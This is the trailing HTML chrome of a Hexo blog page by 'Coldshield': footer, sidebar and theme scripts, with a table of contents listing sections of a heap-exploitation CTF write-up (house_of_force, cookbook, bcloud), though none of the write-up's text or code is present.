    <a href="/2020/02/25/FSOP-the-end/" rel="next" title="FSOP&the_end">
      FSOP&the_end <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#how2heap-house-of-force-amp-cookbook、bcloud"><span class="nav-number">1.</span> <span class="nav-text">how2heap - house_of_force&amp;cookbook、bcloud</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#house-of-force-c"><span class="nav-number">2.</span> <span class="nav-text">house_of_force.c</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Debug"><span class="nav-number">2.1.</span> <span class="nav-text">Debug</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#cookbook"><span class="nav-number">3.</span> <span class="nav-text">cookbook</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析"><span class="nav-number">3.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#main"><span class="nav-number">3.1.1.</span> <span class="nav-text">main</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#init-RecAndIng"><span class="nav-number">3.1.2.</span> <span class="nav-text">init_RecAndIng</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#struct"><span class="nav-number">3.1.3.</span> <span class="nav-text">struct</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#main-menu"><span class="nav-number">3.1.4.</span> <span class="nav-text">main_menu</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#All-in-one"><span class="nav-number">3.1.5.</span> <span class="nav-text">All in one</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析-amp-Exploite"><span class="nav-number">3.2.</span> <span class="nav-text">漏洞分析&amp;Exploite</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#leak"><span class="nav-number">3.2.1.</span> <span class="nav-text">leak</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Arbitrary-write"><span class="nav-number">3.2.2.</span> <span class="nav-text">Arbitrary write</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整EXP"><span class="nav-number">3.3.</span> <span class="nav-text">完整EXP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#bcloud"><span class="nav-number">4.</span> <span class="nav-text">bcloud</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析-1"><span class="nav-number">4.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#初始化函数"><span class="nav-number">4.1.1.</span> <span class="nav-text">初始化函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#input-name"><span class="nav-number">4.1.1.1.</span> <span class="nav-text">input_name</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#input-org-host"><span class="nav-number">4.1.1.2.</span> <span class="nav-text">input_org_host</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#new"><span class="nav-number">4.1.2.</span> <span class="nav-text">new</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#edit"><span class="nav-number">4.1.3.</span> <span class="nav-text">edit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#delete"><span class="nav-number">4.1.4.</span> <span class="nav-text">delete</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit"><span class="nav-number">4.2.</span> <span class="nav-text">Exploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整EXP-1"><span class="nav-number">4.3.</span> <span class="nav-text">完整EXP</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Coldshield"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Coldshield</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Coldshield</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.2
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
